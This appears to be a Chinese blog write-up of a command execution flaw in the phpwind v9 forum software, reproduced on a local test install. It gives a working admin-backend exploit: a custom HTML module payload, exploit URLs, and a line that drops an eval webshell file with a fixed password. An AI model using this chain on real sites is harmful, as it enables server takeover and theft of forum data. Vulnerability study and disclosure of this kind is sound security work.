已知漏洞:https://www.seebug.org/vuldb/ssvid-94465

phpwind v9最新版存在命令执行漏洞(登陆后台)

Phpwind_v9.0.2(最新版),phpwind_v9.0.1

命令执行

高危(getshell)

phpwind是一个基于PHP和MySQL的开源社区程序,是国内最受欢迎的通用型论坛程序之一。社区可提供丰富的应用,满足人们获取信息、交流、娱乐、消费等生活需求。Phpwind_v9.0.2(最新版),phpwind_v9.0.1版本登陆后台,调用代码,存在命令执行漏洞,进而getshell。

攻击者可获取网站社区的数据库信息,可发布信息等。

漏洞验证

版本phpwind_v9.0.2,登陆后台,门户-->模块管理-->调用管理-->添加模块,新增模块-->选择自定义html,下一步,写入<?php phpinfo(); ?> ,然后调用代码。

选择调用站外代码xml,复制连接,访问,调用xml,json都可以。去掉xml,会执行phpinfo();

该漏洞出现的文件路径为:软件安装根目录\src\applications\design\controller

\ApiController.php,具体代码位置如下图所示

默认安装,需要登陆后台

1,本地搭建的环境phpwind_v9.0.2,源码下载(链接: https://pan.baidu.com/s/1J8BaaOEvCDU0O3MyHKgKQQ 密码: qrgg)。实验用的是phpwind_v9.0.2环境,phpwind_v9.0.1的方法是一样的(源码下载链接: https://pan.baidu.com/s/1lQpLGChPiKcxhujiLtWp7Q 密码: ydj3)。下载好默认安装就好,如果打不开首页,须将.htaccess删除。

2,本地进行实验,默认安装,登陆后台(admin.php)(http://127.0.0.1/test/phpwind_v9.0.2_utf8/phpwind_v9.0.2_utf8_20170401/admin.php),门户-->模块管理-->调用管理-->添加模块,新增模块-->选择自定义html,下一步,写入<?php phpinfo(); ?> ,然后调用代码。

3,选择调用站外代,复制连接,访问,调用xml,json都可以。以xml为例(http://127.0.0.1/test/phpwind_v9.0.2_utf8/phpwind_v9.0.2_utf8_20170401/index.php?m=design&c=api&token=Y6s5Q0iwMq&id=4&format=xml),

去掉xml,会执行phpinfo

4,将代码换成( <?php fputs(fopen("orange.php","w"),"<?eval(\$_POST[orange]);?>");?> )

新建一个orange.php文件,将一句话写入orange.php文件。

(http://127.0.0.1/test/phpwind_v9.0.2_utf8/phpwind_v9.0.2_utf8_20170401/index.php?m=design&c=api&token=tbB6LdMe6q&id=5&format=xml)

5,(http://127.0.0.1/test/phpwind_v9.0.2_utf8/phpwind_v9.0.2_utf8_20170401/orange.php),密码orange

源码下载(链接: https://pan.baidu.com/s/1J8BaaOEvCDU0O3MyHKgKQQ 密码: qrgg)

本文链接(http://www.cnblogs.com/Oran9e/p/8681391.html),转载请注明。

phpwind v9存在命令执行漏洞(登陆后台)的更多相关文章

  1. phpwind < v6 版本命令执行漏洞

    phpwind/sort.php 会定期每天处理一次帖子的浏览量.回复量.精华版排序 代码直接使用savearray将数据库查询出来的内容写入php文件,savearray出来的参数,都使用" ...

  2. 齐治运维堡垒机后台存在命令执行漏洞(CNVD-2019-17294)分析

    基本信息 引用:https://www.cnvd.org.cn/flaw/show/CNVD-2019-17294 补丁信息:该漏洞的修复补丁已于2019年6月25日发布.如果客户尚未修复该补丁,可联 ...

  3. D-Link service.cgi远程命令执行漏洞复现

    1.1 概述 友讯集团(D-Link),成立于1986年,1994年10月于台湾证券交易所挂牌上市,为台湾第一家上市的网络公司,以自创D-Link品牌行销全球,产品遍及100多个国家. 1月17日,C ...

  4. Kali学习笔记30:身份认证与命令执行漏洞

    文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 实验环境: Kali机器:192.168.163.13 ...

  5. weblogic发序列化命令执行漏洞工具分享

    weblogic发序列化命令执行漏洞工具分享(链接: https://pan.baidu.com/s/1qE5MFJ32672l-MMl-QL-wQ 密码: d85j) JBOSS_EXP 工具分享( ...

  6. NETGEAR 系列路由器命令执行漏洞简析

    NETGEAR 系列路由器命令执行漏洞简析 2016年12月7日,国外网站exploit-db上爆出一个关于NETGEAR R7000路由器的命令注入漏洞.一时间,各路人马开始忙碌起来.厂商忙于声明和 ...

  7. [web安全原理]PHP命令执行漏洞基础

    前言 PHP命令执行漏洞 应用程序的某些功能功能需要调用可以执行系统命令的函数,如果这些函数或者函数的参数被用户控制,就有可能通过命令连接符将恶意命令拼接到正常的函数中,从而随意执行系统命令,这就是命 ...

  8. HFS远程命令执行漏洞入侵抓鸡黑阔服务器

    先来科普一下: HFS是什么? hfs网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统,如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须 ...

  9. ASP代码审计 -4.命令执行漏洞总结

    命令执行漏洞: 保存为cmd.asp,提交链接: http://localhost/cmd.asp?ip=127.0.0.1 即可执行命令 <%ip=request("ip" ...

随机推荐

  1. Ubuntu用android-ndk-r15c编译boost_1_65_1

    方法一(最简单的): 下载:android-ndk-r16-beta1 然后下载Boost-for-Android:https://github.com/moritz-wundke/Boost-for ...

  2. 在 NLTK 中使用 Stanford NLP 工具包

    转载自:http://www.zmonster.me/2016/06/08/use-stanford-nlp-package-in-nltk.html 目录 NLTK 与 Stanford NLP 安 ...

  3. 第三视角Beta答辩总结

    第三视角Beta答辩总结 博客链接以及团队信息 组长博客链接 成员信息(按拼音排序) 姓名 学号 备注 张扬 031602345 组长 陈加伟 031602204 郭俊彦 031602213 洪泽波 ...

  4. nginx搭建以及其配置文件

    nginx搭建: 参考link:https://blog.csdn.net/wxyjuly/article/details/79443432 nginx配置文件详解: 参考link:https://w ...

  5. github的优势

    1.GitHub作为托管平台只支持git版本库托管而不像其他开源项目托管平台还对CVS.SVN.Hg 等格式的版本库进行托管.GitHub 的哲学很简单,既然 Git 是最好的版本控制系统之一(对于很 ...

  6. 调试lldb命令常用

    0.关于iOS的UI显示调试的三方控件 Reveal “po”命令是“print object”(打印对象)的简写.“$eax”是cup的一个寄存器.在一个异常的情况下,这个寄存器将会包含一个异常对象 ...

  7. 定义一个Collection接口类型的变量,引用一个Set集合的实现类,实现添加单个元素, 添加另一个集合,删除元素,判断集合中是否包含一个元素, 判断是否为空,清除集合, 返回集合里元素的个数等常用操作。

    package com.lanxi.demo2; import java.util.HashSet; import java.util.Iterator; import java.util.Set; ...

  8. go 语言如何跨平台编译

    以evio源码的分析来说明: 我们看到在有些文件的头部有这样一个标识:文件链接:https://github.com/tidwall/evio/blob/master/evio_unix.go // ...

  9. 入门项目 A5-3 interface-user 第三方接口3

    ''' 用户接口层 ''' # 导入数据库包下面的处理数据模,为了使用其内部名称空间 from db import db_handler # 注册接口函数,接收名字与密码两个参数 def regist ...

  10. echarts环形图自动定位radius

    根据后台返回数据条数进行pie图radius定位:     var a = 100; var b = 0; var c = 0; var radius = []; for (var i in data ...